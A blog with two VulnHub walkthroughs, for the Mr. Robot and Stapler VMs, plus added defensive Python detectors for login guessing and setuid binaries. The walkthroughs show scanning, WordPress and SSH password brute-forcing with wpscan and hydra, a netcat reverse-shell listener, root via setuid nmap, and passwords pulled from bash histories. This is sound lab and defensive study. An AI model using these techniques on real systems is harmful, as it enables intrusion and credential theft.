Tuesday, July 5, 2016

fsociety - Mr. R0b0t

Mr. Robot vulnerable VM by jason

"Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate."

Let's Reap Some Bytes

Command:  netdiscover -r 10.10.10.0/24

Command: nmap -sS -Pn -p1-65535 10.10.10.4

Sweet. Nothing but http/https running. 

Command:  nikto -host 10.10.10.4
Nice, WordPress.
This should definitely help us get a rev shell.


Command: wpscan --url http://10.10.10.4

WPScan has revealed much of the same normal stuff. Although nikto did not tell us that a robots.txt was present, so I will wget the robots.txt file and see if there are any other clues to be found.
Command:  wget http://10.10.10.4/robots.txt
Command: cat robots.txt
So robots.txt reveals our first key and a fsocity.dic file. We use wget to retrieve both.

First Key: 073403c8a58a1f80d943455fb30724b9

User Enumeration: 
So I decided to reinvent the wheel and create my own WordPress user enum tool. (WPScan can do this, but I wanted to work in some Python of my own, for learning's sake.)

My Code
****NOTE: I opted not to use threading due to the small amount of enumeration that needs to occur. I would add multithreading if I were to use very large username lists ****


Command: python MrRobot_WPUsername_Enum.py /usr/share/wordlists/ByteReaper_Lists/Given-Names http://10.10.10.4/wp-login.php


Found User: elliot  (the name list i used is from outpost9)

Using the username elliot we should be able to brute-force a password. I decided that the fsocity.dic file would be a good dictionary to use, as it was given to us by the author :)
Command: wpscan --url http://10.10.10.4 --wordlist ~/Documents/MrRobot/fsocity.dic --threads 50 --username elliot

Awesome we have a hit...after 4 hours...because the password was the 2nd to last word in the list....thanks for that...
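From the defender's side, both steps above (walking user IDs to build a username list, then hammering wp-login.php with a wordlist) leave a distinctive trail in the web server's access log. The following is an added example, not the author's enumeration tool and not part of the VM: it parses Apache combined-format lines and flags a client that sweeps `/?author=N` (WordPress redirects real IDs to the author archive, which is the oracle enumeration tools use) or that POSTs to wp-login.php and gets HTTP 200 back many times (a failed login re-renders the form with 200; a success redirects with 302). The log lines and the thresholds are constructed assumptions.

```python
"""Spot WordPress username enumeration and login guessing in an Apache
access log. Added example for this write-up, not the author's tool;
the log lines below are constructed."""
import re
from collections import defaultdict

# Apache "combined" format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
AUTHOR_RE = re.compile(r'\?author=(\d+)')  # /?author=N author-archive probe


def parse_line(line):
    """Return a dict with ip, ts, method, path, status, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def analyze(lines, author_threshold=5, login_threshold=20):
    """Return sorted (ip, finding, count) tuples for suspicious clients.

    Two signals: a client walking /?author=1,2,3... (a cheap user-list
    oracle, since real IDs redirect to the author's archive), and a client
    POSTing to wp-login.php and receiving HTTP 200 many times (failed login
    re-renders the form with 200; a successful one redirects with 302)."""
    author_ids = defaultdict(set)   # ip -> distinct author IDs probed
    login_fails = defaultdict(int)  # ip -> failed login POSTs
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        m = AUTHOR_RE.search(rec['path'])
        if m:
            author_ids[rec['ip']].add(int(m.group(1)))
        if (rec['method'] == 'POST' and rec['status'] == 200
                and rec['path'].split('?')[0].endswith('/wp-login.php')):
            login_fails[rec['ip']] += 1
    alerts = []
    for ip, ids in author_ids.items():
        if len(ids) >= author_threshold:
            alerts.append((ip, 'author-id sweep', len(ids)))
    for ip, n in login_fails.items():
        if n >= login_threshold:
            alerts.append((ip, 'wp-login guessing', n))
    return sorted(alerts)


def access_line(ip, method, path, status, sec):
    """Build one constructed combined-format log line (demo helper)."""
    return (f'{ip} - - [05/Jul/2016:10:00:{sec:02d} -0400] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"')


# Constructed sample: one normal visitor, and one client that runs an
# author-ID sweep and then a login-guessing run against wp-login.php.
SAMPLE_LOG = [
    access_line('10.10.10.5', 'GET', '/', 200, 0),
    access_line('10.10.10.5', 'POST', '/wp-login.php', 302, 1),
]
SAMPLE_LOG += [access_line('10.10.10.99', 'GET', f'/?author={i}',
                           301 if i <= 3 else 404, i) for i in range(1, 9)]
SAMPLE_LOG += [access_line('10.10.10.99', 'POST', '/wp-login.php', 200, 10 + i)
               for i in range(25)]

if __name__ == '__main__':
    for ip, finding, count in analyze(SAMPLE_LOG):
        print(f'{ip}: {finding} ({count} requests)')
```

Feed it real lines with `analyze(open('/var/log/apache2/access.log'))`; the thresholds are deliberately low for the demo, and on a busy site the wp-login count is better judged per client over a time window, as a rate limiter or fail2ban jail would do it.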

Upon logging in as elliot I was able to modify the PHP of the site to add a reverse shell.
Command: nc -lvp 80
Sweet, we have a rev shell. Now let's power it up.
Command: python -c "import pty;pty.spawn('/bin/bash');"
Looking at the home folder we can see that robot is readable.
Command: ls -lah

Sweet, the 2nd flag (we cannot read it currently, and admittedly I forgot to go back for it).
Command: cat password.raw-md5

Dropping the hash into Google resulted in "abcdefghijklmnopqrstuvwxyz". lul.


Command: su robot

(again i forgot to cat the 2-of-3-flag.txt file)...

I did a good amount of looking around for sudo -l, crons, etc. I found nothing much with any of them. But what I did find was a SUID bit on nmap. Awesome, nmap has an interactive mode. Let's see if we can get anything with it.
Command: nmap --interactive

Sweet. We got r00t. and our third flag.

w00t w00t. flag 3 ==>  04787ddef27c3dee1ee161b21670b4e4
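The root path here is a setuid copy of nmap that the VM's author planted. The check that catches this on a real host is a periodic setuid/setgid inventory diffed against an approved baseline. The following is an added example, not the author's code: it walks a tree, lists regular files with the SUID or SGID bit set, and reports any not on the baseline. The baseline paths are an assumption for a typical Ubuntu box (build the real one from a clean image), and the demo tree it creates is constructed.

```python
"""Audit a filesystem tree for SUID/SGID binaries that are not on an
approved baseline. Added example, not the VM author's code; the baseline
is an assumption to adapt per host, and the demo tree is constructed."""
import os
import stat
import tempfile

# Assumed baseline: absolute paths that legitimately carry the setuid bit on
# a typical Ubuntu install. Key it by full path (never by basename alone) and
# ideally pair each entry with the file's hash.
BASELINE = {
    '/usr/bin/passwd', '/usr/bin/sudo', '/usr/bin/chsh', '/usr/bin/chfn',
    '/usr/bin/gpasswd', '/usr/bin/newgrp', '/bin/su', '/bin/mount',
    '/bin/umount', '/bin/ping',
}


def find_setid(root):
    """Return sorted paths of regular files under root with SUID or SGID set."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append(path)
    return sorted(found)


def audit(root, baseline=BASELINE):
    """Return setid binaries under root that are not in the approved baseline."""
    return [p for p in find_setid(root) if p not in baseline]


def make_demo_tree():
    """Create a constructed directory: an expected setuid 'passwd', an
    unexpected setuid 'nmap' (the escalation path above) and a plain file."""
    root = tempfile.mkdtemp(prefix='suid-demo-')
    for name, mode in (('passwd', 0o4755), ('nmap', 0o4755), ('plain', 0o755)):
        path = os.path.join(root, name)
        with open(path, 'w') as fh:
            fh.write('#!/bin/sh\nexit 0\n')
        os.chmod(path, mode)   # chmod after writing, since a write clears setuid
    return root


if __name__ == '__main__':
    demo = make_demo_tree()
    # Baseline for the demo tree: only its own passwd is approved.
    for path in audit(demo, {os.path.join(demo, 'passwd')}):
        print('unexpected setuid binary:', path)
    # Real use: run audit('/', BASELINE) as root on a schedule and diff runs.
```

On a production host the same listing is one `find / -perm /6000 -type f` away; the value of the script is the baseline comparison, so that a newly setuid nmap (or a setuid copy of any shell or editor) shows up as a diff rather than as one line among fifty.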


Sorry for the abbreviated ending to this tutorial. I was trying to finish asap before the long weekend.

Thanks again to vulnhub for hosting this awesomeness.

Monday, June 27, 2016

Excuse me...I believe you have my stapler

Stapler

He110 w0rld! Today I will be sharing a guide to completing the Stapler VM hosted on VulnHub. This VM was created by the one and only @g0tmi1k.

As always there will be spoilers within this guide so use as little or as much as you need.

***With all these VMs there are always multiple ways to r00t the box***



+---------------------------------------------------------+
|                                                         |
|                                  __..--''\              |
|                          __..--''         \             |
|                  __..--''          __..--''             |
|          __..--''          __..--''       |             |
|          \ o        __..--''____....----""              |
|           \__..--''\                                    |
|           |         \                                   |
|          +----------------------------------+           |
|          +----------------------------------+           |
|                                                         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|   Name: Stapler           |          IP: DHCP           |
|   Date: 2016-June-08      |        Goal: Get Root!      |
| Author: g0tmi1k           | Difficultly: ??? ;)         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|                                                         |
| + Average beginner/intermediate VM, only a few twists   |
|   + May find it easy/hard (depends on YOUR background)  |
|   + ...also which way you attack the box                |
|                                                         |
| + It SHOULD work on both VMware and Virtualbox          |
|   + REBOOT the VM if you CHANGE network modes           |
|   + Fusion users, you'll need to retry when importing   |
|                                                         |
| + There are multiple methods to-do this machine         |
|   + At least two (2) paths to get a limited shell       |
|   + At least three (3) ways to get a root access        |
|                                                         |
| + Made for BsidesLondon 2016                            |
|   + Slides: https://download.vulnhub.com/media/stapler/ |
|                                                         |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
|   + ...and shout-outs to the VulnHub-CTF Team =)        |
|                                                         |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
|                                                         |
|       --[[~~Enjoy. Have fun. Happy Hacking.~~]]--       |
|                                                         |
+---------------------------------------------------------+
 
Let's reap some bytes...

Discovery

Command: netdiscover -r 192.168.153.0/24
***Please note your IP Range can/will differ***
Currently scanning: 192.168.153.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.153.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.153.142 00:0c:29:8b:3c:14 1 60 VMware, Inc.
192.168.153.254 00:50:56:f8:e3:7b 1 60 VMware, Inc.

Enumeration

Command: nmap -sS -Pn -p1-65535 192.168.153.142
root@lulb0x:~# nmap -sS -Pn -p1-65535 192.168.153.142
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-24 15:26 EDT
Nmap scan report for Red.Initech (192.168.153.142)
Host is up (0.00023s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
12380/tcp open unknown
MAC Address: 00:0C:29:8B:3C:14 (VMware)
Lots of fun stuff to play with. 

Service Exploration

FTP


root@lulb0x:~# ftp 192.168.153.142
Connected to 192.168.153.142.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.153.142:root): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (50.0442 kB/s)
ftp> exit

Interesting, a potential user: Harry. I will add this to the list of potential users. Reading our loot (note) reveals...
root@lulb0x:~# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Once again, more potential users: elly and john. With nothing more to see / do in the FTP realm at this time, we move on.

SSH

Usually there is nothing to gain from trying to SSH at this point, but I always connect just to see if the banner (assuming there is one) has any hints that we can put away for a later time.
 
root@lulb0x:~# ssh 192.168.153.142
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
root@192.168.153.142's password:
Sweet, another potential user: barry... At this point we can try to brute-force the SSH service, but I will hold off a bit longer just in case. No need to make more noise at this point.

666 - The port of the beast!!!

root@lulb0x:~# nc 192.168.153.142 666
PK [binary data]
message2.jpgUT [binary data]
[binary data continues]
Brutal... Looks like someone wants me to have a file of some sort.
Command: nc 192.168.153.142 666 > Satanic_File
root@lulb0x:~/Documents/Stapler/Satans_Port# file Satanic_File
Satanic_File: Zip archive data, at least v2.0 to extract
So our Satanic_File seems to be a Zip file.
Command: unzip Satanic_File
root@lulb0x:~/Documents/Stapler/Satans_Port# unzip Satanic_File.zip
Archive: Satanic_File.zip
inflating: message2.jpg
So the unzip reveals a JPG that displays a message.
Great, yet another potential user: scott
Now, I have been burned a couple of times in these VMs by not checking out the JPGs for hidden messages. So I always run strings on the images.
Command: strings message2.jpg
JFIF
vPhotoshop 3.0
8BIM
If you are reading this, you should get a cookie!
If you are reading this you should get a cookie.....no thanks, I don't eat cookies, I steal them :) Seems that there is nothing else to do with Satan's Port. So we move along.

Port 12380

Trying to figure out what port 12380 contains with netcat was pretty simple.
Interesting, a webpage with 3 more people's names:
dave
tim
zoe

Port 80 / 12380: HTTP(S?)

Since we know that 12380 turned out to be a website, we can now run nikto and dirb/dirbuster against them.
Command: nikto -host 192.168.153.142; dirb http://192.168.153.142
root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142; dirb http://192.168.153.142
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.153.142
+ Target Hostname: 192.168.153.142
+ Target Port: 80
+ Start Time: 2016-06-27 10:56:46 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2016-06-27 10:56:58 (GMT-4) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jun 27 10:56:58 2016
URL_BASE: http://192.168.153.142/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.153.142/ ----
+ http://192.168.153.142/.bashrc (CODE:200|SIZE:3771)
+ http://192.168.153.142/.profile (CODE:200|SIZE:675)
-----------------
END_TIME: Mon Jun 27 10:57:02 2016
DOWNLOADED: 4612 - FOUND: 2
We can see that it initially finds 2 files: .bashrc and .profile.
Looking quickly, I didn't find anything of earth-shattering awesome sauce, so I moved on to 12380.
Command: nikto -host 192.168.153.142 -port 12380;
root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142 -port 12380;
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.153.142
+ Target Hostname: 192.168.153.142
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2016-06-27 11:01:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.153.142' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2016-06-27 11:02:40 (GMT-4) (100 seconds)

So we are getting an SSL cert, and we get another user: pam.
Also, we get 2 folders from the robots.txt file:
admin112233
blogblog (potentially a cms) nice.
Navigating to https://192.168.153.142:12380/admin112233 gives us the following (did you get caught :)  )

Moving on...

blogblog reveals itself as a WordPress site. Sweet. If we get a credential, hopefully we can edit a theme and drop a rev shell or RCE.

For this next part I am going to use wpscan to find everything of value. (If you are looking for another awesome tutorial, a video one, check out https://7ms.us. Brian does a great job of explaining what flags to use for wpscan. Thanks Brian @7minsec.)

Command: wpscan --url https://192.168.153.142:12380/blogblog/ -e u[1-20] -e a
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: https://192.168.153.142:12380/blogblog/
[+] Started: Mon Jun 27 11:17:31 2016
[!] The WordPress 'https://192.168.153.142:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.153.142:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.153.142:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-includes/
[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 21 vulnerabilities identified from the version number
So we know that it is running version 4.2.1 with 21 vulnerabilities...nice... But I want to see what (if any) users could be found.
[+] Enumerating usernames ...
[+] Identified the following 16 user/s:
+----+---------+-----------------+
| Id | Login | Name |
+----+---------+-----------------+
| 1 | john | John Smith |
| 2 | elly | Elly Jones |
| 3 | peter | Peter Parker |
| 4 | barry | Barry Atkins |
| 5 | heather | Heather Neville |
| 6 | garry | garry |
| 7 | harry | harry |
| 8 | scott | scott |
| 9 | kathy | kathy |
| 10 | tim | tim |
| 11 | zoe | ZOE |
| 12 | dave | Dave |
| 13 | simon | Simon |
| 14 | abby | Abby |
| 15 | vicki | Vicki |
| 16 | pam | Pam |
+----+---------+-----------------+
Damn.... That's a lot of users, some of which look pretty familiar:
pam
dave
zoe
tim
garry
harry
barry
peter
john
elly

I remember seeing a message for elly stating that there was a payload waiting for her in her FTP account... or something like that. Let's see if wpscan can brute-force her password.
Command: wpscan --url https://192.168.153.142:12380/blogblog/ --wordlist /usr/share/wordlists/rockyou_5max.txt --username elly

****NOTE: rockyou_5max.txt is just the rockyou list but only the words that are 5 chars or less****
****NOTE v2.0: I created a brute-forcer in Python for finding the password also; as a codemonkey I feel the need to always try on my own. If anyone wants it feel free to leave a comment and I can share it with you****
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
[+] [SUCCESS] Login : elly Password : ylle
Brute Forcing 'elly' Time: 00:18:01
+----+-------+------+----------+
| Id | Login | Name | Password |
+----+-------+------+----------+
| | elly | | ylle |
+----+-------+------+----------+
[+] Finished: Mon Jun 27 11:46:55 2016
[+] Requests Done: 99717
[+] Memory used: 42.395 MB
[+] Elapsed time: 00:18:04

Ooh... elly was cracked with the password of ylle.
Let's switch back and try her credentials on the FTP service and see if we get lucky with some password reuse.
root@lulb0x:~/Documents/Stapler# ftp 192.168.153.142
Connected to 192.168.153.142.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.153.142:root): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Bingo... but what can we see?
Command: ls
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 5 0 0 4096 Jun 03 13:51 X11
drwxr-xr-x 3 0 0 4096 Jun 03 13:51 acpi
-rw-r--r-- 1 0 0 3028 Apr 20 23:09 adduser.conf
-rw-r--r-- 1 0 0 51 Jun 03 19:20 aliases
-rw-r--r-- 1 0 0 12288 Jun 03 19:20 aliases.db
drwxr-xr-x 2 0 0 4096 Jun 07 01:57 alternatives
drwxr-xr-x 8 0 0 4096 Jun 03 17:46 apache2
drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apparmor
drwxr-xr-x 9 0 0 4096 Jun 06 23:17 apparmor.d
drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apport
drwxr-xr-x 6 0 0 4096 Jun 03 14:05 apt
-rw-r----- 1 0 1 144 Jan 14 23:35 at.deny
drwxr-xr-x 5 0 0 4096 Jun 03 14:47 authbind
-rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc
drwxr-xr-x 2 0 0 4096 Jun 03 13:52 bash_completion.d
-rw-r--r-- 1 0 0 367 Jan 27 15:17 bindresvport.blacklist
drwxr-xr-x 2 0 0 4096 Apr 12 11:30 binfmt.d
drwxr-xr-x 2 0 0 4096 Jun 03 13:51 byobu
drwxr-xr-x 3 0 0 4096 Jun 03 13:51 ca-certificates
-rw-r--r-- 1 0 0 7788 Jun 03 13:51 ca-certificates.conf
drwxr-xr-x 2 0 0 4096 Jun 03 13:49 console-setup
drwxr-xr-x 2 0 0 4096 Jun 03 19:13 cron.d
drwxr-xr-x 2 0 0 4096 Jun 03 17:07 cron.daily
drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.hourly
drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.monthly
drwxr-xr-x 2 0 0 4096 Jun 03 13:51 cron.weekly
-rw-r--r-- 1 0 0 722 Apr 05 22:59 crontab
-rw-r--r-- 1 0 0 54 Jun 03 13:51 crypttab
drwxr-xr-x 2 0 0 4096 Jun 04 00:02 dbconfig-common
drwxr-xr-x 4 0 0 4096 Jun 03 13:51 dbus-1
-rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf
-rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version
drwxr-xr-x 3 0 0 4096 Jun 05 23:04 default
-rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf
drwxr-xr-x 2 0 0 4096 Jun 03 13:49 depmod.d
drwxr-xr-x 4 0 0 4096 Jun 03 13:49 dhcp
-rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf
drwxr-xr-x 2 0 0 4096 Jun 03 14:19 dnsmasq.d
drwxr-xr-x 4 0 0 4096 Jun 07 01:57 dpkg
-rw-r--r-- 1 0 0 96 Apr 20 23:09 environment
drwxr-xr-x 4 0 0 4096 Jun 03 14:18 fonts
-rw-r--r-- 1 0 0 594 Jun 03 13:49 fstab

/etc = lulz. Let's grab the passwd file and see if any of our potential users are actual users.
Command: get passwd
ftp> get passwd
local: passwd remote: passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2908 bytes).
226 Transfer complete.
2908 bytes received in 0.00 secs (6.6826 MB/s)
Command: cat passwd | grep bash | cut -d':' -f1
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
MFrei
SStroud
JKanode
CJoo
Drew
jess
SHAY
mel
zoe
NATHAN
elly

Okay, time to let hydra do what it does best.
Command: hydra -L Actual_Users -P /usr/share/john/password.lst ssh://192.168.153.142 -t 15 -u
root@lulb0x:~/Documents/Stapler# hydra -L Actual_Users -P /usr/share/wordlists/rockyou.txt ssh://192.168.153.142 -t 15 -u
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-27 13:19:14
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 15 tasks per 1 server, overall 64 tasks, 272543581 login tries (l:19/p:14344399), ~283899 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 162.00 tries/min, 162 tries in 00:01h, 272543419 todo in 28039:27h, 15 active
[22][ssh] host: 192.168.153.142 login: Drew password: qwerty
[STATUS] 203.67 tries/min, 611 tries in 00:03h, 272542970 todo in 22303:02h, 15 active
[22][ssh] host: 192.168.153.142 login: JBare password: cookie
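A run like this, 160 to 200 tries a minute over 19 accounts with 15 parallel sessions, is loud in sshd's auth.log, and the same sliding-window logic catches the wpscan brute-force against elly earlier on this page if it is pointed at the web log instead. The following is an added example, not part of the write-up: it parses "Failed password" and "Accepted password" lines, keeps a per-source window of recent failures, distinguishes a user-list run (hydra -L, many accounts) from hammering a single account, and records whether a flagged source later logged in successfully. The log lines, the year (syslog timestamps carry none) and the thresholds are constructed assumptions.

```python
"""Sliding-window detector for SSH password guessing in sshd auth.log lines.
Added example, not part of the write-up; the log lines are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

AUTH_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<ip>\d+\.\d+\.\d+\.\d+)'
)
LOG_YEAR = 2016  # syslog timestamps carry no year; assumed for the sample


def detect(lines, window=60, threshold=10):
    """Return {ip: finding} for sources with >= threshold failed logins inside
    any `window`-second span. 'kind' separates a run over a user list (hydra -L,
    as above) from hammering one account; 'success' records an accepted login
    from a flagged source, which is the line that turns noise into an incident."""
    recent = defaultdict(deque)   # ip -> failure timestamps within the window
    tried = defaultdict(set)      # ip -> usernames attempted
    alerts = {}
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m['ts'], '%b %d %H:%M:%S').replace(year=LOG_YEAR)
        ip = m['ip']
        if m['result'] == 'Accepted':
            if ip in alerts:
                alerts[ip]['success'] = m['user']
            continue
        q = recent[ip]
        q.append(ts)
        tried[ip].add(m['user'])
        while (ts - q[0]).total_seconds() > window:   # expire old failures
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(ip, {'kind': None, 'peak': 0, 'users': 0, 'success': None})
            a['peak'] = max(a['peak'], len(q))
            a['users'] = len(tried[ip])
            a['kind'] = 'user-list attack' if a['users'] > 1 else 'single-account brute force'
    return alerts


T0 = datetime(LOG_YEAR, 6, 27, 13, 19, 14)   # same start time as the hydra run above


def auth_line(ip, result, user, offset, invalid=False):
    """Build one constructed sshd line `offset` seconds after T0."""
    ts = (T0 + timedelta(seconds=offset)).strftime('%b %d %H:%M:%S')
    who = ('invalid user ' if invalid else '') + user
    return f'{ts} red sshd[2345]: {result} password for {who} from {ip} port 51234 ssh2'


USERS = ['RNunemaker', 'ETollefson', 'Drew', 'JBare', 'SHayslett']  # names from passwd above
SAMPLE_AUTH_LOG = [
    auth_line('192.168.153.50', 'Failed', 'admin', 3, invalid=True),  # one typo, then a normal login
    auth_line('192.168.153.50', 'Accepted', 'zoe', 9),
]
# A user-list run: 30 failures in 58 seconds cycling through five accounts, then a hit.
SAMPLE_AUTH_LOG += [auth_line('192.168.153.1', 'Failed', USERS[i % 5], 2 * i) for i in range(30)]
SAMPLE_AUTH_LOG.append(auth_line('192.168.153.1', 'Accepted', 'Drew', 70))

if __name__ == '__main__':
    for ip, finding in detect(SAMPLE_AUTH_LOG).items():
        print(ip, finding)
```

The response this enables is the one hydra itself warns about in its output: per-source rate limiting (fail2ban or `MaxAuthTries` plus a firewall rule), and, because hydra found two valid passwords in under four minutes, moving the box to key-only authentication.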
Using the credentials JBare:cookie
Trying to cut some corners, since it seems that all the home folders are public readable....
Command: cat */.bash_history
JBare@red:/home$ cat */.bash_history
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
top
ps aux
exit
exit
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
whoami
exit
exit
exit
exit
exit
cat: peter/.bash_history: Permission denied
exit
exit
exit
exit
exit
exit
id
top
exit
Nice... 2 more sets of credentials:

JKanode:thisismypassword
peter:JZQuyIN5
